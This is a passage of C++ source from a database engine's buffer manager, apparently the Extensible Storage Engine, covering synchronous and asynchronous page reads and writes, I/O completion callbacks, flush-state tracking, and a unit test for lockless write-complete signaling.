for ( pbfT = pgnopbf.pbf; pbfT != pbfNil && pbfT != pbf; pbfT = pbfT->pbfTimeDepChainNext );
Enforce( pbfT == pbf );
Enforce( pbf->pbfTimeDepChainNext == pbfNil );
g_bfhash.ReadUnlockKey( &lock );
}
// this function performs a Sync Read into the specified Write Latched BF
void BFISyncRead( PBF pbf, const OSFILEQOS qosIoPriorities, const TraceContext& tc )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
// prepare sync read
BFIPrepareReadPage( pbf );
pbf->fLazyIO = fFalse;
AssertRTL( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
IFileAPI *const pfapi = g_rgfmp[pbf->ifmp].Pfapi();
const QWORD ibOffset = OffsetOfPgno( pbf->pgno );
const DWORD cbData = CbBFIPageSize( pbf );
BYTE* const pbData = (BYTE*)pbf->pv;
ERR err = JET_errSuccess;
const OSFILEQOS qosIoUserDispatch = QosBFIMergeInstUserDispPri( PinstFromIfmp( pbf->ifmp ), (BFTEMPOSFILEQOS)qosIoPriorities );
// This goes off because we don't pass bflfNew when appropriate on recovery, and recovery
// has to on-demand extend. Be nice to fix this ...
//Expected( pbf->bfat != bfatPageAlloc );
// if we are not mapping views then read the data into the buffer. if we
// are mapping views then we will do this on page verification
// We could optionally for bfatViewMapped BFs check FOSMemoryResident() and do the IO a little
// earlier. Not a material win though at this point (either perf or code simplification)
if ( !FBFICacheViewCacheDerefIo( pbf ) )
{
HRT hrtStart = HrtHRTCount();
err = pfapi->ErrIORead( tc,
ibOffset,
cbData,
pbData,
qosIoUserDispatch | qosIOSignalSlowSyncIO,
NULL, // Passing a NULL pfnCompletion triggers sync I/O (foreground on this thread).
DWORD_PTR( pbf ),
IFileAPI::PfnIOHandoff( BFISyncReadHandoff ) );
BFITrackCacheMissLatency( pbf, hrtStart, ( tc.iorReason.Iorf() & iorfReclaimPageFromOS ) ? bftcmrReasonPagingFaultDb : bftcmrReasonSyncRead, qosIoPriorities, tc, err );
Ptls()->threadstats.cPageRead++;
}
// complete sync read
BFISyncReadComplete( err, pfapi, err == wrnIOSlow ? qosIOCompleteIoSlow : 0, ibOffset, cbData, pbData, pbf );
}
void BFISyncReadHandoff( const ERR err,
IFileAPI* const pfapi,
const FullTraceContext& tc,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf,
void* const pvIOContext )
{
Assert( JET_errSuccess == err ); // Yeah!!!
BFISetIOContext( pbf, pvIOContext );
}
void BFISyncReadComplete( const ERR err,
IFileAPI* const pfapi,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
// reset the I/O context, since the operation is officially completed.
if ( AtomicReadPointer( &pbf->pvIOContext ) != NULL )
{
BFIResetIOContext( pbf );
}
else
{
Assert( FBFICacheViewCacheDerefIo( pbf ) );
}
// read was successful
if ( err >= 0 )
{
// declare I/O successful but page unverified
ERR errT = ErrERRCheck( errBFIPageNotVerified );
pbf->err = SHORT( errT );
Assert( pbf->err == errT );
PERFOpt( cBFCacheUnused.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
// record the fact the read IO was suspiciously slow
if ( grbitQOS & qosIOCompleteIoSlow )
{
pbf->fSuspiciouslySlowRead = fTrue;
}
}
// read was not successful
else
{
// declare the appropriate I/O error
pbf->err = SHORT( err );
Assert( pbf->err == err );
Assert( pbf->err != JET_errFileIOBeyondEOF ); // BF no longer caches/keeps BFs in EOF state.
}
pbf->fLazyIO = fFalse;
PERFOpt( cBFPagesReadSync.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
ERR ErrBFIAsyncPreReserveIOREQ( IFMP ifmp, PGNO pgno, OSFILEQOS qos, VOID ** ppioreq )
{
IFileAPI *const pfapi = g_rgfmp[ifmp].Pfapi();
const QWORD ibOffset = OffsetOfPgno( pgno );
const DWORD cbData = g_rgfmp[ifmp].CbPage();
return pfapi->ErrReserveIOREQ( ibOffset, cbData, qos, ppioreq );
}
VOID BFIAsyncReleaseUnusedIOREQ( IFMP ifmp, VOID * pioreq )
{
IFileAPI *const pfapi = g_rgfmp[ifmp].Pfapi();
pfapi->ReleaseUnusedIOREQ( pioreq );
}
// this function performs a Async Read into the specified Write Latched BF
ERR ErrBFIAsyncRead( PBF pbf, OSFILEQOS qos, VOID * pioreq, const TraceContext& tc )
{
ERR err = JET_errSuccess;
Assert( pbf->sxwl.FOwnWriteLatch() );
// only current user is ErrBFIPrereadPage which always pre-allocs an ioreq
Assert( pioreq );
Assert( tc.iorReason.Iorp() != iorpNone ); // iorp should be set by the caller
// prepare async read
BFIPrepareReadPage( pbf );
pbf->fLazyIO = fFalse; // this may change some day ...
AssertRTL( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
IFileAPI *const pfapi = g_rgfmp[pbf->ifmp].Pfapi();
const QWORD ibOffset = OffsetOfPgno( pbf->pgno );
const DWORD cbData = CbBFIPageSize( pbf );
BYTE* const pbData = (BYTE*)pbf->pv;
// we must be passing qosIODispatchImmediate or qosIODispatchBackground or ErrIORead() can fail ...
Assert( qosIODispatchImmediate == ( qosIODispatchMask & qos ) ||
qosIODispatchBackground == ( qosIODispatchMask & qos ) );
// This will indicate an underlying inefficiency, because it means we're
// prereading either a new page (non-sensical, that can't happen today)
// or a page off the EOF (now that recovery is fixed - thanks SOMEONE, this
// open happens when DbScan blindly pre-reads past the end of the file).
// I (SOMEONE) think should still go off for downlevel (pre "Create DB
// Logs Final DB Size") ... but it didn't go off when I tested with
// ViewCache on globally, so leaving this in for now. May need to be
// taken out... or if you're ambitious, enhanced.
Expected( pbf->bfat != bfatPageAlloc || tc.iorReason.Iort() == iortDbScan );
const BOOL fMapped = FBFICacheViewCacheDerefIo( pbf );
if ( fMapped )
{
Assert( BoolParam( JET_paramEnableViewCache ) );
g_rgfmp[ pbf->ifmp ].IncrementAsyncIOForViewCache();
}
// Note: We let bfatPageAlloc go through and do the IO, because it
// completes with an EOF when appropriate (for DbScan).
if ( pbf->bfat == bfatViewMapped && FOSMemoryPageResident( pbData, cbData ) )
{
// Pre-success / early out!
// We've mapped a view, and the OS already says the page is here, so we can just
// consider the IO "instantly" completed. IO saved. Good job OS. :-)
Assert( BoolParam( JET_paramEnableViewCache ) );
// the pre-allocated io-req is not needed after all
BFIAsyncReleaseUnusedIOREQ( pbf->ifmp, pioreq );
pioreq = NULL;
OSTraceFMP( pbf->ifmp, JET_tracetagBufferManager, OSFormat( "OS File Cache preread skipped for page=[0x%x:0x%x]", (ULONG)pbf->ifmp, pbf->pgno ) );
// directly fire the I/O completion callbacks for this async read
FullTraceContext ftc;
ftc.DeepCopy( GetCurrUserTraceContext().Utc(), tc );
BFIAsyncReadHandoff( JET_errSuccess, pfapi, ftc, qos, ibOffset, cbData, pbData, pbf, NULL );
BFIAsyncReadComplete( JET_errSuccess, pfapi, ftc, qos, ibOffset, cbData, g_rgbBFTemp, pbf );
Ptls()->cbfAsyncReadIOs++; // should remove this - more accurate, but causes assert.
CallS( err ); // we should be returning a success
goto HandleError;
}
// if we are not mapping views then read the data into the buffer
err = pfapi->ErrIORead( tc,
ibOffset,
cbData,
// On mapped IO, we must not read to the OS MM provided pbData ... but
// we still want to incur the OS to read the data, so it will end up
// in the OS MM and then the pbData will just magically get patched up
// and become valid from the OS MM. Magic. We therefore on mapped IO
// read it to a junk buffer, but keep the BF state associated with the
// operation until it completes.
fMapped ? g_rgbBFTemp : pbData,
qos,
IFileAPI::PfnIOComplete( BFIAsyncReadComplete ),
DWORD_PTR( pbf ),
IFileAPI::PfnIOHandoff( BFIAsyncReadHandoff ),
pioreq );
CallS( err );
Assert( ( qos & qosIOOptimizeCombinable ) || err == JET_errSuccess );
if ( err < JET_errSuccess )
{
if ( fMapped )
{
g_rgfmp[ pbf->ifmp ].DecrementAsyncIOForViewCache();
}
goto HandleError;
}
// track that we've an outstanding async read we must ensure is issued
if ( err >= JET_errSuccess )
{
Ptls()->cbfAsyncReadIOs++;
}
HandleError:
return err;
}
void BFIAsyncReadHandoff( const ERR err,
IFileAPI* const pfapi,
const FullTraceContext& tc,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf,
void* const pvIOContext )
{
Assert( JET_errSuccess == err ); // Yeah!!!
if ( pvIOContext != NULL )
{
BFISetIOContext( pbf, pvIOContext );
}
else
{
Assert( FBFICacheViewCacheDerefIo( pbf ) );
}
// Ok, ok, let the IO Manager have this one ...
pbf->sxwl.ReleaseOwnership( bfltWrite );
}
void BFIAsyncReadComplete( const ERR err,
IFileAPI* const pfapi,
const FullTraceContext& tc,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf )
{
pbf->sxwl.ClaimOwnership( bfltWrite );
// reset the I/O context, since the operation is officially completed.
if ( AtomicReadPointer( &pbf->pvIOContext ) != NULL )
{
BFIResetIOContext( pbf );
}
else
{
Assert( FBFICacheViewCacheDerefIo( pbf ) );
}
// paramEnableViewCache based IOs should always be with g_rgbBFTemp, and not for any other case
Assert( !FBFICacheViewCacheDerefIo( pbf ) || pbData == g_rgbBFTemp );
Assert( FBFICacheViewCacheDerefIo( pbf ) || pbData != g_rgbBFTemp );
// read was successful
if ( err >= 0 )
{
// declare I/O successful but page unverified
ERR errT = ErrERRCheck( errBFIPageNotVerified );
pbf->err = SHORT( errT );
Assert( pbf->err == errT );
PERFOpt( cBFCacheUnused.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
// record the fact the read IO was suspiciously slow
if ( grbitQOS & qosIOCompleteIoSlow )
{
pbf->fSuspiciouslySlowRead = fTrue;
}
}
// read was not successful
else
{
// declare the appropriate I/O error
pbf->err = SHORT( err );
Assert( pbf->err == err );
Assert( pbf->err != JET_errFileIOBeyondEOF ); // BF no longer caches/keeps BFs in EOF state.
}
pbf->fLazyIO = fFalse;
PERFOpt( cBFPagesReadAsync.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
if ( grbitQOS & qosIOOptimizeCombinable )
{
PERFOpt( cBFPagesCoalescedRead.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
// trace that we have just preread a page
ETCachePrereadPage(
pbf->ifmp,
pbf->pgno,
tc.utc.context.dwUserID,
tc.utc.context.nOperationID,
tc.utc.context.nOperationType,
tc.utc.context.nClientType,
tc.utc.context.fFlags,
tc.utc.dwCorrelationID,
tc.etc.iorReason.Iorp(),
tc.etc.iorReason.Iors(),
tc.etc.iorReason.Iort(),
tc.etc.iorReason.Ioru(),
tc.etc.iorReason.Iorf(),
tc.etc.nParentObjectClass );
// This means we're doing a view-cache fake
if ( g_rgbBFTemp == pbData )
{
g_rgfmp[ pbf->ifmp ].DecrementAsyncIOForViewCache();
}
// release our Write Latch on this BF
pbf->sxwl.ReleaseWriteLatch();
}
// this function performs a Sync Write from the specified Exclusive Latched BF
ERR ErrBFISyncWrite( PBF pbf, const BFLatchType bfltHave, OSFILEQOS qos, const TraceContext& tc )
{
Assert( FBFIUpdatablePage( pbf ) );
// prepare sync write
BFIPrepareWritePage( pbf );
Assert( !FBFIUpdatablePage( pbf ) );
Assert( qosIODispatchImmediate == ( qos & qosIODispatchMask ) ); // calculate fLazyIO correctly anyway
pbf->fLazyIO = ( qosIODispatchImmediate != ( qos & qosIODispatchMask ) );
AssertRTL( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
IFileAPI *const pfapi = g_rgfmp[pbf->ifmp].Pfapi();
const QWORD ibOffset = OffsetOfPgno( pbf->pgno );
const DWORD cbData = CbBFIPageSize( pbf );
BYTE* const pbData = (BYTE*)pbf->pv;
ERR err = JET_errSuccess;
// issue sync write
err = pfapi->ErrIOWrite( tc,
ibOffset,
cbData,
pbData,
qos,
NULL, // Passing a NULL pfnCompletion triggers sync I/O (foreground on this thread).
DWORD_PTR( pbf ),
IFileAPI::PfnIOHandoff( BFISyncWriteHandoff ) );
// complete sync write
FullTraceContext fullTc;
fullTc.DeepCopy( GetCurrUserTraceContext().Utc(), tc );
BFISyncWriteComplete( err, pfapi, fullTc, qos, ibOffset, cbData, pbData, pbf, bfltHave );
return err;
}
void BFISyncWriteHandoff( const ERR err,
IFileAPI* const pfapi,
const FullTraceContext& tc,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf,
void* const pvIOContext )
{
Assert( JET_errSuccess == err ); // Yeah!!!
BFISetIOContext( pbf, pvIOContext );
}
void BFISyncWriteComplete( const ERR err,
IFileAPI* const pfapi,
const FullTraceContext& tc,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf,
const BFLatchType bfltHave )
{
// reset the I/O context, since the operation is officially completed.
BFIResetIOContext( pbf );
// trace that we have just written a page
BFITraceWritePage( pbf, tc );
Enforce( CmpLgpos( pbf->lgposModify, g_rgfmp[ pbf->ifmp ].LgposWaypoint() ) <= 0 ); // just for insurance
// Update the flush map with the proper flush state.
if ( FBFIDatabasePage( pbf ) )
{
if ( err >= JET_errSuccess )
{
CPAGE::PageFlushType pgft = CPAGE::pgftUnknown;
DBTIME dbtime = dbtimeNil;
const LONG cbBuffer = g_rgcbPageSize[ pbf->icbBuffer ];
CFlushMap* const pfm = g_rgfmp[ pbf->ifmp ].PFlushMap();
const BOOL fIsPagePatching = ( tc.etc.iorReason.Iorp() == IOREASONPRIMARY( iorpPatchFix ) );
const BOOL fIsFmRecoverable = pfm->FRecoverable();
CPAGE cpage;
const LONG cbPage = g_rgcbPageSize[ pbf->icbPage ];
Assert( cbBuffer == cbPage );
cpage.LoadPage( pbf->ifmp, pbf->pgno, pbf->pv, cbBuffer );
dbtime = cpage.Dbtime();
if ( !FUtilZeroed( (BYTE*)pbf->pv, cbBuffer ) && ( dbtime != dbtimeShrunk ) && ( dbtime != dbtimeRevert ) )
{
pgft = cpage.Pgft();
}
cpage.UnloadPage();
if ( fIsPagePatching && fIsFmRecoverable )
{
(void)pfm->ErrSetPgnoFlushTypeAndWait( pbf->pgno, pgft, dbtime );
}
else
{
pfm->SetPgnoFlushType( pbf->pgno, pgft, dbtime );
}
}
}
// release our reference count on the range lock now that our write has completed
AssertTrack( pbf->bfbitfield.FRangeLocked(), "BFSyncCompleteRangeNotLocked" );
g_rgfmp[ pbf->ifmp ].LeaveRangeLock( pbf->pgno, pbf->irangelock );
pbf->bfbitfield.SetFRangeLocked( fFalse );
// write was successful
if ( err >= JET_errSuccess )
{
// reset BF to "cleaned" status
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "%s: [%s:%s] written to disk (dbtime: %s)",
__FUNCTION__,
OSFormatUnsigned( pbf->ifmp ),
OSFormatUnsigned( pbf->pgno ),
OSFormatUnsigned( (ULONG_PTR)((DBTIME*)pbf->pv)[ 1 ] ) ) );
// versioned pages will no longer be accessed once flushed so we mark them
// as supercold to get them out of the cache quickly
if ( pbf->fOlderVersion )
{
BFIMarkAsSuperCold( pbf, fFalse );
}
const BOOL fFlushed = pbf->fFlushed;
PERFOptDeclare( TCE tce = pbf->tce );
Assert( pbf->err != errBFIPageNotVerified );
Assert( pbf->err != errBFIPageRemapNotReVerified ); // only exists in pWriteSignalComplete
BFICleanPage( pbf, bfltHave );
pbf->fLazyIO = fFalse;
// update our page write stats
if ( fFlushed )
{
PERFOpt( cBFPagesRepeatedlyWritten.Inc( PinstFromIfmp( pbf->ifmp ), tce ) );
}
pbf->fFlushed = fTrue;
PERFOpt( cBFPagesWritten.Inc( PinstFromIfmp( pbf->ifmp ), tce ) );
}
// write was not successful
else
{
// declare the appropriate I/O error
pbf->err = SHORT( err );
Assert( pbf->err == err );
Assert( pbf->err != JET_errFileIOBeyondEOF ); // illegal to have EOF lingering in the cache
pbf->fLazyIO = fFalse;
// update our page write stats
if ( pbf->fFlushed )
{
PERFOpt( cBFPagesRepeatedlyWritten.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
else
{
pbf->fFlushed = fTrue;
}
PERFOpt( cBFPagesWritten.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
if ( tc.etc.iorReason.Iorp() == iorpBFDatabaseFlush )
{
g_asigBFFlush.Set();
}
// Sync IOs QOS doesn't have QOS signals back ... so can not check for qosIOCompleteWriteGameOn here, but
// we shouldn't have Sync iorpBFCheckpointAdv IOs anyways, always signal just in case. If we were getting
// them here - would have to decide if we are signaling checkpoint adv unnecessarily or too much.
Expected( tc.etc.iorReason.Iorp() != iorpBFCheckpointAdv );
if ( tc.etc.iorReason.Iorp() == iorpBFCheckpointAdv )
{
BFIMaintCheckpointDepthRequest( &g_rgfmp[pbf->ifmp], bfcpdmrRequestIOThreshold );
}
}
// this function prepares and schedules a BF for Async Write
ERR ErrBFIAsyncWrite( PBF pbf, OSFILEQOS qos, const TraceContext& tc )
{
Assert( FBFIUpdatablePage( pbf ) );
// prepare async write
BFIPrepareWritePage( pbf );
pbf->fLazyIO = ( qosIODispatchImmediate != ( qos & qosIODispatchMask ) );
Assert( !FBFIUpdatablePage( pbf ) );
AssertRTL( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
qos |= ( UlParam( PinstFromIfmp( pbf->ifmp ), JET_paramFlight_NewQueueOptions ) & bitUseMetedQ ) ? qosIODispatchWriteMeted : 0x0;
// issue async write
IFileAPI * const pfapi = g_rgfmp[pbf->ifmp].Pfapi();
const ERR err = pfapi->ErrIOWrite( tc,
OffsetOfPgno( pbf->pgno ),
CbBFIPageSize( pbf ),
(BYTE*)pbf->pv,
qos,
IFileAPI::PfnIOComplete( BFIAsyncWriteComplete ),
DWORD_PTR( pbf ),
IFileAPI::PfnIOHandoff( BFIAsyncWriteHandoff ) );
CallSx( err, errDiskTilt );
// deal with disk over quota / tilted
if ( errDiskTilt == err )
{
Assert( SHORT( wrnBFPageFlushPending ) == pbf->err );
Assert( pbf->sxwl.FOwnExclusiveLatch() );
pbf->err = JET_errSuccess;
}
return err;
}
void BFIAsyncWriteHandoff( const ERR err,
IFileAPI* const pfapi,
const FullTraceContext& tc,
const OSFILEQOS grbitQOS,
const QWORD ibOffset,
const DWORD cbData,
const BYTE* const pbData,
const PBF pbf,
void* const pvIOContext )
{
Assert( JET_errSuccess == err ); // Yeah!!!
BFISetIOContext( pbf, pvIOContext );
Enforce( CmpLgpos( pbf->lgposModify, g_rgfmp[ pbf->ifmp ].LgposWaypoint() ) <= 0 ); // just for insurance
// while the pbf->err = wrnBFPageFlushPending, we maintain a sort of virtual x-latch, in
// that all consumers in BF of the x-latch know that we can't give out an updatable buffer
// while undergoing IO.
Enforce( wrnBFPageFlushPending == pbf->err );
AssertRTL( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
#ifdef EXTRA_LATCHLESS_IO_CHECKS
// We may be able to do this for bfat == bfatPageAlloc as well. Of course make sure it matches in BFIFlushComplete()!
if ( !FBFICacheViewCacheDerefIo( pbf ) &&
(DWORD)CbBFIBufferSize( pbf ) >= OSMemoryPageCommitGranularity() )
{
OSMemoryPageProtect( pbf->pv, CbBFIBufferSize( pbf ) );
}
#endif
// Update the perf statistics
if( grbitQOS & qosIOOptimizeCombinable )
{
PERFOpt( cBFPagesFlushedOpportunely.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
if ( bfdfClean == pbf->bfdf )
{
PERFOpt( cBFPagesFlushedOpportunelyClean.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
}
else
{
Expected( bfdfClean != pbf->bfdf ); // would not be flushing a clean page if not qosIOOptimizeCombinable
switch( tc.etc.iorReason.Iorp() )
{
case iorpBFAvailPool:
case iorpBFShrink:
if ( pbf->lrukic.FSuperColded() )
{
if ( pbf->fOlderVersion )
{
// the only internal reason for super colding is older versioned pages
PERFOpt( cBFPagesFlushedScavengeSuperColdInternal.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
else
{
PERFOpt( cBFPagesFlushedScavengeSuperColdUser.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
}
if ( tc.etc.iorReason.Iorp() == iorpBFAvailPool )
{
// Maybe be interesting to independntly track foreground scavenging here
PERFOpt( cBFPagesFlushedAvailPool.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
else if ( tc.etc.iorReason.Iorp() == iorpBFShrink )
{
PERFOpt( cBFPagesFlushedCacheShrink.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
break;
case iorpBFCheckpointAdv:
if ( tc.etc.iorReason.Iorf() & iorfForeground )
{
PERFOpt( cBFPagesFlushedCheckpointForeground.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
else
{
PERFOpt( cBFPagesFlushedCheckpoint.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
}
break;
case iorpBFDatabaseFlush:
Expected( !( tc.etc.iorReason.Iorf() & iorfForeground ) ); // today we don't mark ErrBFFlush foreground, even though it usually is technically foreground IO
// not under PERFOpt because OSTrace from cBFPagesFlushedContextFlush is needed.
PERFZeroDisabledAndDiscouraged( cBFPagesFlushedContextFlush.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
break;
case iorpBFFilthyFlush:
Expected( tc.etc.iorReason.Iorf() & iorfForeground ); // flithy flush only happens on foreground
PERFOpt( cBFPagesFlushedFilthyForeground.Inc( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
break;
default:
AssertSz( fFalse, "Unknown iorp unknown" );
//AssertSz( fFalse, "Unknown iorp = %d", ior.Iorp() );
}
}
Assert( !FBFIUpdatablePage( pbf ) );
Assert( ErrBFIWriteSignalState( pbf ) == wrnBFPageFlushPending );
Enforce( NULL == pbf->pWriteSignalComplete );
// Ok, ok, let the IO Manager have this one ...
pbf->sxwl.ReleaseExclusiveLatch();
}
// this next set of functions controls the "status" of a page being flushed ... the order of sequences is ...
//
// Thread 1: Flusher Thread 2: IO Thread Thread 3: Any old thread
//
// T1 - Some process like checkpoint maintenance or cache shrink decide to flush a dirty page
// and initiates a ErrBFIFlushPage() which will grab the x-latch and validate the page is in
// fact dirty and also the page is not currently in wrnBFPageFlushPending state, and proceeds
// with setting up a flush pending page and dispatching the IO ...
//
// ErrBFIFlushPage( on dirty page )
// x-latch-acquire
// err = wrnBFPageFlushPending
// x-latch-release
// enqueue IO
//
// T2 - At some point after enqueuing the IO Thread will async dispatch the write IO, this
// is left off the diagram as it is out of the buffer manager's scope.
//
// T3 - The IO is completed from the OS, and the IO manager will call back to the buffer
// manager's callback / BFIAsyncWriteComplete() on the IO Thread. This call back signals that the
// write is completed with a possible error via BFIWriteSignalSetComplete(), leaving it up to
// any other thread to finish completing the flush.
//
// BFIAsyncWriteComplete()
// BFIWriteSignalSetComplete( err )
//
// T4 - Finally some other thread takes an interest in the page (could be a write latch, or
// another flush attempt for checkpoint or even BFPurge) and checks if the write is signaled
// complete, and if so completes the flush operation / BFIFlushComplete().
//
// ErrBFIFlushPage or ErrBFILatchPage or other ...
// x-latch-acquire || w-latch-acquire
// // now safe to check state ...
// if ( pbf->err == wrnBFPageFlushPending &&
// wrnBFPageFlushPending != ErrBFIWriteSignalState( pbf ) )
// BFIFlushComplete()
// BFIWriteSignalReset()
// BFICleanPage( if no error )
//
// T3 and T4 could happen in either order, but it is impossible for T4 to happen first AND end up
// calling BFIFlushComplete() due to the "wrnBFPageFlushPending != ErrBFIWriteSignalState( pbf )"
// check. If T4 goes first, that thread just misses the chance to be the lucky thread to
// complete the flush operation and clean the page (if appropriate).
//
// Also due to the "pbf->err == wrnBFPageFlushPending" check and the x-latch, it is impossible
// for T4 to happen before T1.
//
// The primary logic in T4 is encapsulated in FBFICompleteFlushPage(), which if it returns true
// will guarantee FBFIUpdatablePage().
//
ERR ErrBFIWriteSignalIError( ULONG_PTR pWriteSignal )
{
Assert( pWriteSignal <= 0xFFFF ); // should be self consistent
SHORT errS = (SHORT)( pWriteSignal & 0xFFFF );
if ( wrnBFIWriteIOComplete == errS ) // works because it is a warning
{
return JET_errSuccess;
}
return errS; // implicit cast restores sign
}
ERR ErrBFIWriteSignalState( const PBF pbf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( pbf->err == wrnBFPageFlushPending );
const ULONG_PTR pWriteSignal = pbf->pWriteSignalComplete;
if ( pbf->err == wrnBFPageFlushPending && pWriteSignal )
{
const ERR err = ErrBFIWriteSignalIError( pWriteSignal );
Assert( wrnBFPageFlushPending != err );
Assert( wrnBFIWriteIOComplete != err );
return err;
}
return wrnBFPageFlushPending;
}
void BFIWriteSignalSetComplete( PBF pbf, const ERR err )
{
// can't set, b/c of unit test.
// Assert( pbf->sxwl.FNotOwner() );
Assert( pbf->err == wrnBFPageFlushPending );
// Can't signal write complete with wrnBFPageFlushPending, otherwise ErrBFIWriteSignalState()
// would be inconsistent.
Assert( err != wrnBFPageFlushPending );
// We truncate the error down to 16 bits, so that we can assert later that our state is consistent.
ULONG_PTR pSignal;
if ( err == JET_errSuccess )
{
pSignal = 0xFFFF & wrnBFIWriteIOComplete;
}
else
{
pSignal = 0xFFFF & err;
}
const ULONG_PTR pInitial = pbf->pWriteSignalComplete;
Enforce( NULL == pInitial ); // right now we support no other next states in conjunction with this ...
Assert( ErrBFIWriteSignalIError( pSignal ) == err );
const ULONG_PTR pBefore = (ULONG_PTR)AtomicCompareExchangePointer( (void**)&(pbf->pWriteSignalComplete), (void*)pInitial, (void*)pSignal );
// NOTE: we've now lost the "virtual latch" that lockless-IO affords us ...
Enforce( pBefore == pInitial );
}
void BFIWriteSignalReset( const PBF pbf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
Assert( pbf->err == wrnBFPageFlushPending );
const ULONG_PTR pInitial = pbf->pWriteSignalComplete;
const ULONG_PTR pBefore = (ULONG_PTR)AtomicCompareExchangePointer( (void**)&(pbf->pWriteSignalComplete), (void*)pInitial, NULL );
Enforce( pInitial == pBefore ); // should be no competition right now
}
JETUNITTEST( BF, LocklessWriteCompleteSignaling )
{
BF bfLocal;
PBF pbf = &bfLocal;
pbf->sxwl.ClaimOwnership( bfltWrite );
CHECK( 0 == CmpLgpos( &(bfLocal.lgposOldestBegin0), &lgposMax ) ); // ensuring .ctor was called ...
ERR err;
// .ctor should've gone, and this is the initial state ...
CHECK( JET_errSuccess == pbf->err );
CHECK( 0 == pbf->pWriteSignalComplete );
// asserts pbf->err == wrnBFPageFlushPending, which is right, we shouldn't be calling if not in a flush ...
// CHECK( wrnBFPageFlushPending == ErrBFIWriteSignalState( pbf ) );
err = wrnBFPageFlushPending; // ensure no assert
pbf->err = SHORT( err );
CHECK( wrnBFPageFlushPending == ErrBFIWriteSignalState( pbf ) );
BFIWriteSignalSetComplete( pbf, JET_errSuccess );
CHECK( JET_errSuccess == ErrBFIWriteSignalState( pbf ) );
BFIWriteSignalReset( pbf );
// no longer used, but still check warnings are preserved through signal state transition function.
BFIWriteSignalSetComplete( pbf, 4007 /* was: wrnDiskGameOn */ );
CHECK( 4007 == ErrBFIWriteSignalState( pbf ) );
BFIWriteSignalReset( pbf );
BFIWriteSignalSetComplete( pbf, JET_errDiskIO );
CHECK( JET_errDiskIO == ErrBFIWriteSignalState( pbf ) );
BFIWriteSignalReset( pbf );
pbf->sxwl.ReleaseOwnership( bfltWrite );
}
#ifdef DEBUG
// Used to check entire page image on IOs that happen from the IO thread (which is 99% of them).
void * g_pvIoThreadImageCheckCache = NULL;
#endif
// remap a buffer page back (or map/reroute an allocated page) to the OS FS cache
//
// There are two interesting cases:
// 1. We were an already mapped page, and by virtue of updating / dirtying the page, we
// force a COW of the page, and so we need to tell the MM to remap it (non-COWed).
// 2. Because it was a new page we just allocated the memory, and so we want to map the
// page post write to the OS MM / FS cache to save memory.
//
// If this API succeeds (returns fTrue), then the page is [re]mapped to the OS cache
// image, and the BF::err should then be transitioned to errBFIPageRemapNotReVerified
// so that the page will be re-verified by front line latch paths. See fRemappedRet
// delcaration for more details on why done this way.
//
#ifdef DEBUG
QWORD g_cRemapsConsidered = 0;
QWORD g_cRemapsSkippedByLatchContention = 0;
QWORD g_cRemapsSuccessful = 0;
QWORD g_cRemapsOfViewMapped = 0;
QWORD g_cRemapsOfPageAlloc = 0;
QWORD g_cRemapsFailed = 0;
QWORD g_cRemapsNonResident = 0;
#endif
BOOL FBFICacheRemapPage( __inout PBF pbf, IFileAPI* const pfapi )
{
ERR errReRead = JET_errSuccess; // we return neither of these, return just whether we remapped
ERR errCheckPage = JET_errSuccess;
VOID * pvFreshMapPage = NULL;
Assert( UlParam( JET_paramEnableViewCache ) );
Assert( pbf->sxwl.FOwnWriteLatch() );
Assert( pbf->bfat == bfatViewMapped || pbf->bfat == bfatPageAlloc );
Assert( pfapi == g_rgfmp[pbf->ifmp].Pfapi() ); // that would just be odd
// if we are not the current version this page will be evicted almost immediately, so
// do not bother remapping ...
if ( !pbf->fCurrentVersion )
{
return fFalse;
}
// check basic assumptions about the state of the page
if ( pbf->bfat == bfatViewMapped )
{
Assert( FOSMemoryFileMapped( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) );
Assert( pbf->bfdf == bfdfClean || FOSMemoryFileMappedCowed( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) );
}
else
{
Assert( pbf->bfat == bfatPageAlloc );
Assert( FOSMemoryPageAllocated( pbf->pv, g_rgcbPageSize[pbf->icbPage] ) );
